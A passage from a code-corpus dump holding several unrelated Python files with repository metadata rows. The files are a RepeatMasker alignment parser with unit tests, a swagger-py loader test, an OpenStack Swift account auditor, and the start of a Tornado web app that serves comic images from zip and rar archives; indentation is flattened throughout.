# three spaces that are used as column seperators for those.
if ANNOTATION_KEY in pairwise_alignment.meta:
res += (((f_len + max_num_len) * ' ') + " " +
pairwise_alignment.meta[ANNOTATION_KEY][i:i + column_width] + "\n")
# output sequence two
res += (s2_comp + " " + s2_n + " ")
s2_line_start_num_str = str(s2_line_start_num)
s2_num_padding = max_num_len - len(s2_line_start_num_str)
res += (' ' * s2_num_padding) + s2_line_start_num_str + " "
res += pairwise_alignment.s2[i:i + column_width] + " "
res += str(s2_line_end_num) + "\n"
res += "\n"
i += column_width
# otuput any meta data key-value pairs that aren't known to us.
if pairwise_alignment.meta is not None:
for k in pairwise_alignment.meta:
if k not in KNOWN_KEYS:
if k is ROUNDTRIP_KEY:
res += (pairwise_alignment.meta[k] + "\n")
else:
res += (k + " = " + str(pairwise_alignment.meta[k]) + "\n")
# remove any trailing whitespace
res = res.strip()
return res
###############################################################################
# EXCEPTION CLASSES #
###############################################################################
class AlignmentIteratorError(Exception):
def __init__(self, msg):
self.value = msg
def __str__(self):
return repr(self.value)
###############################################################################
# REPEATMASKER PAIRWISE ALIGNMENT ITERATOR AND HELPER FUNCS #
###############################################################################
def _rm_is_alignment_line(parts, s1_name, s2_name):
"""
return true if the tokenized line is a repeatmasker alignment line.
:param parts: the line, already split into tokens around whitespace
:param s1_name: the name of the first sequence, as extracted from the header
of the element this line is in
:param s2_name: the name of the second sequence, as extracted from the header
of the element this line is in
"""
if len(parts) < 2:
return False
if _rm_name_match(parts[0], s1_name):
return True
if (_rm_name_match(parts[0], s2_name) or
(parts[0] == "C" and _rm_name_match(parts[1], s2_name))):
return True
return False
def _rm_is_header_line(parts, n):
"""
determine whether a pre-split string is a repeat-masker alignment header.
headers have no special structure or symbol to mark them, so this is based
only on the number of elements, and what data type they are.
"""
if (n == 15 and parts[8] == "C"):
return True
if (n == 14 and parts[0].isdigit()):
return True
def _rm_is_valid_annotation_line(line):
"""
:return: True if the line contains only valid annotation characters (defined
in REPEATMASKER_VALID_ANN_CHARS), otherwise False
"""
for c in line:
if c not in REPEATMASKER_VALID_ANN_CHARS:
return False
return True
def _rm_compute_leading_space_alig(space_pres_split, seq):
"""
count the number of characters that precede the sequence in a repeatmasker
alignment line. E.g. in the following line:
' chr1 11 CCCTGGAGATTCTTATT--AGTGATTTGGGCT 41'
the answer would be 24.
:param space_pres_split: the alignment line, split into tokens around spaces,
but with the spaces conserved as tokens.
:param seq: the sequence token.
"""
c = 0
for i in range(0, len(space_pres_split)):
if space_pres_split[i] == seq:
break
c += len(space_pres_split[i])
return c
def _rm_compute_leading_space(space_s_pres_split):
"""
count the number of spaces that precede a non-space token (not including
empty string tokens) in a string.
:param space_s_pres_split: the string, split into tokens around spaces,
but with the spaces conserved as tokens.
"""
i = 0
c = 0
while (i < len(space_s_pres_split) and
(space_s_pres_split[i].isspace() or
(space_s_pres_split[i] == ""))):
c += len(space_s_pres_split[i])
i += 1
return c
def _rm_get_names_from_header(parts):
"""
get repeat and seq. name from repeatmasker alignment header line.
An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
the genomic sequence name is always at position 4 (zero-based index); the
name of the repeat is at position 9 if matching the reverse complement of
the consensus sequence for the repeat and position 8 otherwise
:param parts: the header line, as a tokenized list.
:return: tuple of (name of genomic sequence, name of repeat sequence)
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
return (parts[4], parts[8]) if len(parts) == 14 else (parts[4], parts[9])
def _rm_get_reference_coords_from_header(parts):
"""
extract the reference (genomic sequence match) coordinates of a repeat
occurrence from a repeatmakser header line. An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
the genomic start and end are always at positions 5 and 6 resepctively. In
the repeatmasker format, the end is inclusive, but in pyokit end coordinates
are exclusive, so we adjust it when we parse here.
:param parts: the header line, as a tokenized list.
:return: tuple of (start, end)
"""
s = int(parts[5])
e = int(parts[6]) + 1
if (s >= e):
raise AlignmentIteratorError("invalid repeatmakser header: " +
" ".join(parts))
return (s, e)
def _rm_get_repeat_coords_from_header(parts):
"""
extract the repeat coordinates of a repeat masker match from a header line.
An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
239 29.42 1.92 0.97 chr1 11 17 (41) XX#YY 1 104 (74) m_b1s502i1 4
if the match is to the reverse complement, the start and end coordinates are
at positions 11 and 12 (zero-based indexes), otherwise they're at positions
9 and 10. In the later case, the 'start' is the earlier number and the end
is the larger one. In reverse complement matches, RM lists the 'start' as the
larger number and the end as the smaller one. We swap these around to match
the Pyokit convention of start < end always and also adjust the end so it is
not inclusive of the last position
:param parts: the header line, as a tokenized list.
:return: tuple of (start, end)
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
if len(parts) == 14:
s = int(parts[9])
e = int(parts[10]) + 1
else:
s = int(parts[12])
e = int(parts[11]) + 1
if (s >= e):
raise AlignmentIteratorError("invalid repeatmakser header: " +
" ".join(parts))
return (s, e)
def _rm_is_reverse_comp_match(parts):
"""
determine whether a repeat occurrence is a match to the reverse complement
of the concensus. Headers look like this::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the match is to the reverse complement, then there is a "C" at position
8 (zero-based index) and a total of 15 fields; otherwise the "C" is missing
and there are only 14 fields.
:param parts: the header line, as a tokenized list.
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
return len(parts) == 15
def _rm_get_remaining_genomic_from_header(parts):
"""
get the remaining number of bases that are on the genomic sequence after
the match from the header line of a repeatmasker alignment. An example header
line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
The remaining genomic bases are always at position 7 (zero-based index)
"""
return int(parts[7][1:-1])
def _rm_get_remaining_repeat_from_header(parts):
"""
get the remaining number of bases that are on the repeat consensus after
the match from the header line of a repeatmasker alignment. An example header
line is::
239 29.42 1.92 0.97 chr1 11 17 (41) XX#YY 1 104 (74) m_b1s502i1 4
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the match is to the consensus, this number is at position 11 (zero-based
index), while a match to the reverse complement places it at position 10.
The parenthese indicate it is a negative strand coordinate.
"""
if _rm_is_reverse_comp_match(parts):
return int(parts[10][1:-1])
else:
return int(parts[11][1:-1])
def _rm_parse_header_line(parts, meta_data):
"""
parse a repeatmasker alignment header line and place the extracted meta-data
into the provided dictionary. An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the alignment is to the consensus, this will have 14 fields; to the
reverse complement of the repeat consensus and it'll have 15. Fields as
follows:
===== ======== ==========================================================
Num Value description
===== ======== ==========================================================
0 239 Smith-Waterman score of the match
1 29.42 percent substitutions in match compared to the consensus
2 1.92 percent bases opposite gap in query seq (deleted bp)
3 0.97 percent bases opposite gap in repeat consensus (insert bp)
4 chr1 The name of the reference sequence (usually genomic chrom)
5 11 Start location in reference; always pos strand, I think..
6 17 End location in reference; always pos strand, I think..
7 (41) Distance to end of ref (alt., neg strand co-ord of end)
8 C Alignment is to rev. comp. of consensus. Ommited otherwise
8/9 XX#YY XX is the name of the repeat and YY is the family
9/10 (74) if +'ve, strt coord; else bases before start on neg strand
10/11 104 if +'ve, end coord; else start of match in pos strand
11/12 1 if +'ve, num bases aftr mtch to end; else end in + coords
12/13 m_b1s5.. ....?
13/14 4 unique ID
===== ======== ==========================================================
Note that repeat-masker calls the larger coordinate the start when the match
is to the reverse complement; we swap these internally so start < end always,
regardless of whether the match is to the consensus or the reverse complement
of the consensus
Each field is mapped to a key as follows
===== =================================================================
Num Key (these are defined in pyokit.datastruct.multipleAlignment.py)
===== =================================================================
0 ALIG_SCORE_KEY
1 PCENT_SUBS_KEY
2 PCENT_S1_INDELS_KEY
3 PCENT_S2_INDELS_KEY
4 S1_NAME_KEY
5 S1_START_KEY
6 S1_END_KEY
7 S1_END_NEG_STRAND_KEY
8 S2_REVERSE_COMP_KEY
8/9 S2_NAME_KEY
9/10 S2_START_KEY (S2 + strand) / S2_START_NEG_STRAND_KEY (S2 - strand)
10/11 S2_END_KEY (S2 + strand) / S2_START_KEY (S2 - strand)
11/12 S2_END_NEG_STRAND_KEY (S2 + strand) / S2_END_KEY (S2 - strand)
12/13 UNKNOWN_RM_HEADER_FIELD_KEY
13/14 RM_ID_KEY
===== =================================================================
:param parts: the header line, as a tokenized list.
:param meta_data: dictionary; resultant key-value pairs placed into this.
"""
meta_data[ALIG_SCORE_KEY] = parts[0]
meta_data[PCENT_SUBS_KEY] = float(parts[1])
meta_data[PCENT_S1_INDELS_KEY] = float(parts[2])
meta_data[PCENT_S2_INDELS_KEY] = float(parts[3])
meta_data[ANNOTATION_KEY] = ""
if parts[8] == "C":
meta_data[UNKNOWN_RM_HEADER_FIELD_KEY] = parts[13]
meta_data[RM_ID_KEY] = int(parts[14])
else:
meta_data[UNKNOWN_RM_HEADER_FIELD_KEY] = parts[12]
meta_data[RM_ID_KEY] = int(parts[13])
def _rm_name_match(s1, s2):
"""
determine whether two sequence names from a repeatmasker alignment match.
:return: True if they are the same string, or if one forms a substring of the
other, else False
"""
m_len = min(len(s1), len(s2))
return s1[:m_len] == s2[:m_len]
def _rm_parse_meta_line(parts):
p_locs = []
for i in range(0, len(parts)):
if parts[i].strip() == "=":
p_locs.append(i)
if len(p_locs) != 1:
return ROUNDTRIP_KEY, " ".join(parts)
else:
k = " ".join(parts[:p_locs[0]])
v = " ".join(parts[p_locs[0] + 1:])
return k.strip(), v.strip()
def _rm_extract_sequence_and_name(alig_str_parts, s1_name, s2_name):
"""
parse an alignment line from a repeatmasker alignment and return the name
of the sequence it si from and the sequence portion contained in the line.
:param alig_str_parts: the alignment string, split around whitespace as list
:param s1_name: the name of the first sequence in the alignment this line is
from
:param s2_name: the name of the second sequence in the alignment this line is
from
:return: a tuple of name and sequence string; name will always be either
s1_name or s2_name
:raise AlignmentIteratorError: if the line doesn't have the expected number
of elements, or the name does not match
either of s1_name or s2_name
"""
# first, based on the number of parts we have we'll guess whether its a
# reverse complement or not
if len(alig_str_parts) == 4:
# expect the first element to amtch something..
nm = alig_str_parts[0]
seq = alig_str_parts[2]
elif len(alig_str_parts) == 5:
# expect the second element to match something...
nm = alig_str_parts[1]
seq = alig_str_parts[3]
else:
raise AlignmentIteratorError("failed parsing alignment line '" +
" ".join(alig_str_parts) + "'; reason: " +
"expected this line to have 4 or 5 " +
"elements, but it has " +
str(len(alig_str_parts)))
if _rm_name_match(nm, s1_name):
return s1_name, seq
elif _rm_name_match(nm, s2_name):
return s2_name, seq
else:
raise AlignmentIteratorError("failed parsing alignment line '" +
" ".join(alig_str_parts) + "'; reason: " +
"extracted alignment name (" + nm + ") " +
"did not match either sequence name from " +
"header line (" + s1_name + " or " +
s2_name + ")")
def repeat_masker_alignment_iterator(fn, index_friendly=True, verbose=False):
"""
Iterator for repeat masker alignment files; yields multiple alignment objects.
Iterate over a file/stream of full repeat alignments in the repeatmasker
format. Briefly, this format is as follows: each record (alignment) begins
with a header line (see _rm_parse_header_line documentation for details of
header format), followed by the alignment itself (example below) and finally
a set of key-value meta-data pairs.
The actual alignment looks like this::
chr1 11 CCCTGGAGATTCTTATT--AGTGATTTGGGCT 41
ii v -- v i i v
C MER5B#DNA/hAT 10 CCCCAGAGATTCTGATTTAATTGGTCTGGGGT 42
chr1 42 GACTG 47
v
C MER5B#DNA/hAT 43 CACTG 48
The 'C' indicates that its the reverse complement of the consensus. The
central string gives information about matches; "-" indicates an
insertion/deletion, "i" a transition (G<->A, C<->T) and "v" a transversion
(all other substitutions).
:param fh: filename or stream-like object to read from.
:param index_friendly: if True, we will ensure the file/stream
position is before the start of the record when we
yield it; this requires the ability to seek within
the stream though, so if iterating over a
stream wtihout that ability, you'll have to set this
to false. Further, this will disable buffering for
the file, to ensure file.tell() behaves correctly,
so a performance hit will be incurred.
:param verbose: if true, output progress messages to stderr.
"""
# step 1 -- build our iterator for the stream..
try:
fh = open(fn)
except (TypeError):
fh = fn
iterable = fh
if index_friendly:
iterable = iter(fh.readline, '')
# build progress indicator, if we want one and we're able to
if verbose:
try:
m_fn = ": " + fh.name
except TypeError:
m_fn = ""
try:
current = fh.tell()
fh.seek(0, 2)
total_progress = fh.tell()
fh.seek(current)
pind = ProgressIndicator(totalToDo=total_progress,
messagePrefix="completed",
messageSuffix="of processing repeat-masker "
"alignment file" + m_fn)
except IOError:
pind = None
old_fh_pos = None
new_fh_pos = fh.tell()
s1 = None
s2 = None
s1_name = None
s2_name = None
s1_start = None
s1_end = None
s2_start = None
s2_end = None
meta_data = None
alignment_line_counter = 0
alig_l_space = 0
prev_seq_len = 0
rev_comp_match = None
remaining_repeat = None
remaining_genomic = None
for line in iterable:
if verbose and pind is not None:
pind.done = fh.tell()
pind.showProgress()
if index_friendly:
old_fh_pos = new_fh_pos
new_fh_pos = fh.tell()
line = line.rstrip()
if line.lstrip() == "" and alignment_line_counter % 3 != 1:
continue
s_pres_split = re.split(r'(\s+)', line)
parts = [x for x in s_pres_split if not (x.isspace() or x == "")]
n = len(parts)
for i in REPEATMASKER_FIELDS_TO_TRIM:
if n >= i + 1:
parts[i] = parts[i].strip()
# decide what to do with this line -- is it a header line, part of the
# alignment or a meta-data key-value line
if alignment_line_counter % 3 == 1:
if (REPEATMASKER_VALIDATE_MUTATIONS and
not _rm_is_valid_annotation_line(line)):
raise IOError("invalid mutation line: " + line)
l_space = _rm_compute_leading_space(s_pres_split) - alig_l_space
pad_right = prev_seq_len - (l_space + len(line.strip()))
meta_data[ANNOTATION_KEY] += ((' ' * l_space) + line.strip() +
(' ' * pad_right))
alignment_line_counter += 1
elif _rm_is_header_line(parts, n):
if not (s1 is None and s2 is None and meta_data is None):
if ANNOTATION_KEY in meta_data:
meta_data[ANNOTATION_KEY] = meta_data[ANNOTATION_KEY].rstrip()
if index_friendly:
fh.seek(old_fh_pos)
ss1 = Sequence(s1_name, s1, s1_start, s1_end, "+", remaining_genomic)
s2s = "-" if rev_comp_match else "+"
ss2 = Sequence(s2_name, s2, s2_start, s2_end, s2s, remaining_repeat)
yield PairwiseAlignment(ss1, ss2, meta_data)
if index_friendly:
fh.seek(new_fh_pos)
meta_data = {}
s1 = ""
s2 = ""
s1_name, s2_name = _rm_get_names_from_header(parts)
s1_start, s1_end = _rm_get_reference_coords_from_header(parts)
s2_start, s2_end = _rm_get_repeat_coords_from_header(parts)
rev_comp_match = _rm_is_reverse_comp_match(parts)
remaining_repeat = _rm_get_remaining_repeat_from_header(parts)
remaining_genomic = _rm_get_remaining_genomic_from_header(parts)
_rm_parse_header_line(parts, meta_data)
alignment_line_counter = 0
elif _rm_is_alignment_line(parts, s1_name, s2_name):
alignment_line_counter += 1
name, seq = _rm_extract_sequence_and_name(parts, s1_name, s2_name)
if name == s1_name:
s1 += seq
elif name == s2_name:
s2 += seq
alig_l_space = _rm_compute_leading_space_alig(s_pres_split, seq)
prev_seq_len = len(seq)
else:
k, v = _rm_parse_meta_line(parts)
meta_data[k] = v
if index_friendly:
fh.seek(old_fh_pos)
ss1 = Sequence(s1_name, s1, s1_start, s1_end, "+", remaining_genomic)
s2s = "-" if rev_comp_match else "+"
ss2 = Sequence(s2_name, s2, s2_start, s2_end, s2s, remaining_repeat)
yield PairwiseAlignment(ss1, ss2, meta_data)
if index_friendly:
fh.seek(new_fh_pos)
###############################################################################
# UNIT TESTS FOR THIS MODULE #
###############################################################################
class TestAlignmentIterators(unittest.TestCase):
def setUp(self):
# set up a repeat-masker file...
alig_1_header = "283 26.37 4.21 0.00 chr1 15 67 (266) C A#B (119) " +\
"141 85 m_b1s601i0 5 "
alig_1 = " chr1 15 CCACTGTACA-ATGGGGAAACT--GGCCC 40 \n" +\
" i v - i -- v \n" +\
"C A#B 141 CCATTTTACAGATGAGGAAACTGAGGCAC 113 \n" +\
" \n" +\
" chr1 41 AGAGCAAGGCAAAAGCAGCGCTGGG-TA 67 \n" +\
" v v vv ivi v i - v \n" +\
"C A#B 112 CAGCTAGTAAGTGGCAGAGCCGGGATTC 85 "
alig_1_m = "Matrix = 25p47g.matrix \n" +\
"Kimura (with divCpGMod) = 29.95 \n" +\
"Transitions / transversions = 1.40 (14/10) \n" +\
"Gap_init rate = 0.03 (3 / 90), avg. gap size = 1.33 (4 / 3)"
alig_2_header = "318 22.50 3.61 0.00 chr1 15266 15323 (249235276) C " +\
"MIR3#SINE/MIR (65) 143 84 m_b1s601i1 10"
alig_2 = " chr1 15266 GAAACT--GGCCCAGAGAGGTGAGGCAGCG 15293 \n" +\
" -- i iii \n" +\
"C MIR3#SINE/MIR 143 GAAACTGAGGCCCAGAGAGGTGAAGTGACG 114 \n" +\
" \n" +\
" chr1 15294 GGTCACAGAGCAAGGCAAAAGCGCGCTGGG 15323 \n" +\
" v ? vi ivi v \n" +\
"C MIR3#SINE/MIR 113 GGTCACACAGCKAGTTAGTGGCGAGCTGGG 84"
alig_2_m = "Matrix = 25p47g.matrix \n" +\
"Kimura (with divCpGMod) = 26.25 \n" +\
"Transitions / transversions = 2.40 (12/5) \n" +\
"Gap_init rate = 0.03 (2 / 79), avg. gap size = 1.50 (3 / 2)"
alig_3_header = "18 23.18 0.00 1.96 chr1 15798 15830 (249234772) " +\
"(TGCTCC)n#Simple_repeat 1 32 (0) m_b1s252i0 15"
alig_3 = " chr1 15798 GCTGCTTCTCCAGCTTTCGCTCCTTCATGCT 15828 \n" +\
" v v v iii v - v \n" +\
" (TGCTCC)n#Sim 1 GCTCCTGCTCCTGCTCCTGCTCCTGC-TCCT 30 \n" +\
" \n" +\
" chr1 15829 GC 15830 \n" +\
" \n" +\
" (TGCTCC)n#Sim 31 GC 32 "
alig_3_m = "Matrix = Unknown \n" +\
"Transitions / transversions = 0.43 (3/7) \n" +\
"Gap_init rate = 0.02 (1 / 51), avg. gap size = 1.00 (1 / 1)"
alig_4_header = "487 20.75 0.93 0.93 chr1 158389 158409 (249092126) C " +\
"Charlie29b#DNA/hAT-Charlie (532) 662 641 m_b3s502i21 231"
alig_4 = " chr1 158389 TAGAATTTTTGTGGCAT-ATGA 158409 \n" +\
" i ii v ii - vi \n" +\
"C Charlie29b#DN 662 TAAAGCTGGGCGTTATTGATGA 641 \n"
alig_4_m = ""
self.rm_tc1_records = [alig_1_header + "\n\n" + alig_1 + "\n\n" + alig_1_m,
alig_2_header + "\n\n" + alig_2 + "\n\n" + alig_2_m,
alig_3_header + "\n\n" + alig_3 + "\n\n" + alig_3_m,
alig_4_header + "\n\n" + alig_4 + "\n\n" + alig_4_m]
self.rm_rc_1_input = "\n\n".join(self.rm_tc1_records)
def test_rm_iter_one_part_ann_line(self):
"""
This test for the repeatmakser iterator has an annotation line with just a
single element in it; this exposes a bug that previously existed (now
fixed) where the lines are expected to have >= 2 elements.
"""
debug = False
# set up test
alig_header = "10304 12.32 4.41 4.46 chrUn_gl000247 36396 36422 (0) " +\
"MER57-int#LTR/ERV1 5219 5245 (1398) m_b1s701i6 4562661"
alig = " chrUn_gl00024 36396 TTAATGTGAACAGCTTTTCCCAAGATC 36422\n" +\
" i \n" +\
" MER57-int#LTR 5219 TTGATGTGAACAGCTTTTCCCAAGATC 5245"
test_in = alig_header + "\n\n" + alig
# run test and collect results
results = [r for r in
repeat_masker_alignment_iterator(StringIO.StringIO(test_in))]
self.failUnlessEqual(len(results), 1)
rm_str = _to_repeatmasker_string(results[0], m_name_width=13)
# check results
alig_actual = [x for x in map(str.rstrip, test_in.split("\n"))
if x.strip() != ""]
alig_result = [x for x in map(str.rstrip, rm_str.split("\n"))
if x.strip() != ""]
if debug:
print ""
print "expected: " + str(alig_actual)
print "got: " + str(alig_result)
self.failUnlessEqual(alig_actual, alig_result)
def test_repeat_masker_alignment_iterator(self):
"""Test roundtrip of repeatmasker alignment."""
debug = False
s_io = StringIO.StringIO(self.rm_rc_1_input)
alig_iter = repeat_masker_alignment_iterator(s_io)
results = [r for r in alig_iter]
self.failUnlessEqual(len(results), len(self.rm_tc1_records))
for i, trail_meta_size, c_width, m_width in [(0, 4, 29, None),
(1, 4, 30, None),
(2, 3, 31, 13),
(3, 0, 22, 13)]:
rm_str = _to_repeatmasker_string(results[i], column_width=c_width,
m_name_width=m_width)
if debug:
sys.stderr.write("===============================\n")
sys.stderr.write(rm_str + "\n")
sys.stderr.write("*******************************\n")
sys.stderr.write(self.rm_tc1_records[i] + "\n")
sys.stderr.write("===============================\n")
# strip out the last few lines; these should all be their, but order
# isn't important.
alig_actual = [x for x in map(str.rstrip,
self.rm_tc1_records[i].split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_actual = map(str.rstrip,
self.rm_tc1_records[i].split("\n")[-trail_meta_size:])
alig_result = [x for x in map(str.rstrip,
rm_str.split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_result = map(str.rstrip, rm_str.split("\n")[-trail_meta_size:])
if debug:
sys.stderr.write(str(alig_actual) + "\n")
sys.stderr.write(str(alig_result) + "\n")
self.failUnlessEqual(alig_actual, alig_result)
self.failUnlessEqual(set(meta_actual), set(meta_result))
def test_repeat_masker_on_demand_load(self):
"""
Tests wrapping the alignment iterator in an index and using this index
to build RM alignment objects that are loaded on-demand from the indexed
stream.
"""
from pyokit.io.indexedFile import IndexedFile
def extract_UID(rm_alignment):
return rm_alignment.meta[RM_ID_KEY]
s_io = StringIO.StringIO(self.rm_rc_1_input)
index = IndexedFile(s_io, repeat_masker_alignment_iterator, extract_UID)
for i, trail_meta_size, c_width, m_width, rm_id in [(0, 4, 29, None, 5),
(1, 4, 30, None, 10),
(2, 3, 31, 13, 15),
(3, 0, 22, 13, 231)]:
on_d_alig = JustInTimePairwiseAlignment(index, rm_id)
on_d_str = _to_repeatmasker_string(on_d_alig, column_width=c_width,
m_name_width=m_width)
# strip out the last few lines; these should all be their, but order
# isn't important.
alig_actual = [x for x in map(str.rstrip,
self.rm_tc1_records[i].split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_actual = map(str.rstrip,
self.rm_tc1_records[i].split("\n")[-trail_meta_size:])
alig_result = [x for x in map(str.rstrip,
on_d_str.split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_result = map(str.rstrip, on_d_str.split("\n")[-trail_meta_size:])
self.failUnlessEqual(alig_actual, alig_result)
self.failUnlessEqual(set(meta_actual), set(meta_result))
###############################################################################
# ENTRY POINT WHEN RUN AS A STAND-ALONE MODULE #
###############################################################################
if __name__ == '__main__':
unittest.main()
|
lgpl-2.1
| 2,046,055,904,560,101,600 | 40.561497 | 90 | 0.56526 | false |
adborden/swagger-py
|
swaggerpy_test/loader_test.py
|
2
|
1213
|
#!/usr/bin/env python
#
# Copyright (c) 2013, Digium, Inc.
#
import unittest
import swaggerpy
from swaggerpy import swagger_model
class TestProcessor(swagger_model.SwaggerProcessor):
def process_resource_listing(self, resources, context):
resources['processed'] = True
class LoaderTest(unittest.TestCase):
def test_simple(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json')
self.assertEqual('1.1', uut['swaggerVersion'])
decl = uut['apis'][0]['api_declaration']
self.assertEqual(1, len(decl['models']))
self.assertEqual(1, len(decl['models']['Simple']['properties']))
def test_processor(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json',
processors=[TestProcessor()])
self.assertEqual('1.1', uut['swaggerVersion'])
self.assertTrue(uut['processed'])
def test_missing(self):
try:
swaggerpy.load_file(
'test-data/1.1/missing_resource/resources.json')
self.fail("Expected load failure b/c of missing file")
except IOError:
pass
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
| 4,569,353,490,463,303,700 | 27.880952 | 72 | 0.619126 | false |
garvenshen/zeda-swift
|
swift/account/auditor.py
|
1
|
5227
|
# Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
from random import random
import swift.common.db
from swift.account import server as account_server
from swift.common.db import AccountBroker
from swift.common.utils import get_logger, audit_location_generator, \
config_true_value, dump_recon_cache
from swift.common.daemon import Daemon
from eventlet import Timeout
class AccountAuditor(Daemon):
"""Audit accounts."""
def __init__(self, conf):
self.conf = conf
self.logger = get_logger(conf, log_route='account-auditor')
self.devices = conf.get('devices', '/srv/node')
self.mount_check = config_true_value(conf.get('mount_check', 'true'))
self.interval = int(conf.get('interval', 1800))
self.account_passes = 0
self.account_failures = 0
swift.common.db.DB_PREALLOCATION = \
config_true_value(conf.get('db_preallocation', 'f'))
self.recon_cache_path = conf.get('recon_cache_path',
'/var/cache/swift')
self.rcache = os.path.join(self.recon_cache_path, "account.recon")
def _one_audit_pass(self, reported):
all_locs = audit_location_generator(self.devices,
account_server.DATADIR,
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.account_audit(path)
if time.time() - reported >= 3600: # once an hour
self.logger.info(_('Since %(time)s: Account audits: '
'%(passed)s passed audit,'
'%(failed)s failed audit'),
{'time': time.ctime(reported),
'passed': self.account_passes,
'failed': self.account_failures})
self.account_audit(path)
dump_recon_cache({'account_audits_since': reported,
'account_audits_passed': self.account_passes,
'account_audits_failed':
self.account_failures},
self.rcache, self.logger)
reported = time.time()
self.account_passes = 0
self.account_failures = 0
return reported
def run_forever(self, *args, **kwargs):
"""Run the account audit until stopped."""
reported = time.time()
time.sleep(random() * self.interval)
while True:
self.logger.info(_('Begin account audit pass.'))
begin = time.time()
try:
reported = self._one_audit_pass(reported)
except (Exception, Timeout):
self.logger.increment('errors')
self.logger.exception(_('ERROR auditing'))
elapsed = time.time() - begin
if elapsed < self.interval:
time.sleep(self.interval - elapsed)
self.logger.info(
_('Account audit pass completed: %.02fs'), elapsed)
dump_recon_cache({'account_auditor_pass_completed': elapsed},
self.rcache, self.logger)
def run_once(self, *args, **kwargs):
"""Run the account audit once."""
self.logger.info(_('Begin account audit "once" mode'))
begin = reported = time.time()
self._one_audit_pass(reported)
elapsed = time.time() - begin
self.logger.info(
_('Account audit "once" mode completed: %.02fs'), elapsed)
dump_recon_cache({'account_auditor_pass_completed': elapsed},
self.rcache, self.logger)
def account_audit(self, path):
"""
Audits the given account path
:param path: the path to an account db
"""
start_time = time.time()
try:
if not path.endswith('.db'):
return
broker = AccountBroker(path)
if not broker.is_deleted():
broker.get_info()
self.logger.increment('passes')
self.account_passes += 1
self.logger.debug(_('Audit passed for %s') % broker.db_file)
except (Exception, Timeout):
self.logger.increment('failures')
self.account_failures += 1
self.logger.exception(_('ERROR Could not get account info %s'),
(broker.db_file))
self.logger.timing_since('timing', start_time)
|
apache-2.0
| -9,029,602,981,438,420,000 | 41.153226 | 79 | 0.55309 | false |
chaserhkj/PyComicCast
|
ComicCast.py
|
1
|
3515
|
#!/usr/bin/env python2
# Copyright (c) 2014 Chaserhkj
# This software is licensed under the MIT license.
# See LICENSE for more details.
import tornado.web as web
import tornado.template as template
import tornado.ioloop as ioloop
import os,sys,mimetypes
import rarfile,zipfile
supported_archive = [".zip", ".rar"]
supported_image = [".jpe", ".jpg", ".jpeg", ".gif", ".png"]
work_dir = os.getcwd()
list_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<ul>
{% for i in names %}
<li> <a href="/{{ i[0] }}/0">{{ escape(i[1]) }}</a> </li>
{% end %}
</ul>
</body>
</html>"""
)
image_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
img.content {max-width:100%;}
div.content {text-align:center;}
div.navi {text-align:center;}
</style>
</head>
<body>
<div class="content">
<a href="/{{archive}}/{{image + 1}}"><img class="content" src="/{{archive}}/{{image}}/image"/></a>
</div>
<br />
<br />
<div class="navi">
<a href="/{{archive}}/{{image - 1}}">Previous</a>
<a href="/">Return</a>
<a href="/{{archive}}/{{image + 1}}">Next</a>
</div>
</body>
</html>"""
)
file_objs = {}
def get_file_list():
return [i for i in os.listdir(work_dir) if os.path.splitext(i)[1].lower() in supported_archive]
def get_file_obj(index):
name = get_file_list()[index]
if not name in file_objs:
if name.endswith(".rar"):
obj = rarfile.RarFile(os.path.join(work_dir, name))
elif name.endswith(".zip"):
obj = zipfile.ZipFile(os.path.join(work_dir, name))
else:
raise Exception, "Not supported archive file!"
img_list = [i for i in obj.namelist() if os.path.splitext(i)[1].lower() in supported_image]
img_list.sort()
file_objs[name] = (obj, img_list)
return file_objs[name]
class RootHandler(web.RequestHandler):
def get(self):
self.write(list_template.generate(names=enumerate(get_file_list())))
class ImagePageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
max_index = len(get_file_obj(archive)[1])
if image < 0 or image >= max_index:
self.redirect("/")
return
self.write(image_template.generate(archive=archive,image=image))
class ImageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
obj = get_file_obj(archive)
mimetype = mimetypes.guess_type(obj[1][image])
img = obj[0].open(obj[1][image])
self.set_header("Content-Type", mimetype[0])
while True:
data = img.read(2048)
if not data:
break
self.write(data)
application = web.Application([
(r"/", RootHandler),
(r"/(\d+)/(-?\d+)", ImagePageHandler),
(r"/(\d+)/(-?\d+)/image", ImageHandler)
])
if __name__=="__main__":
if len(sys.argv) >= 2:
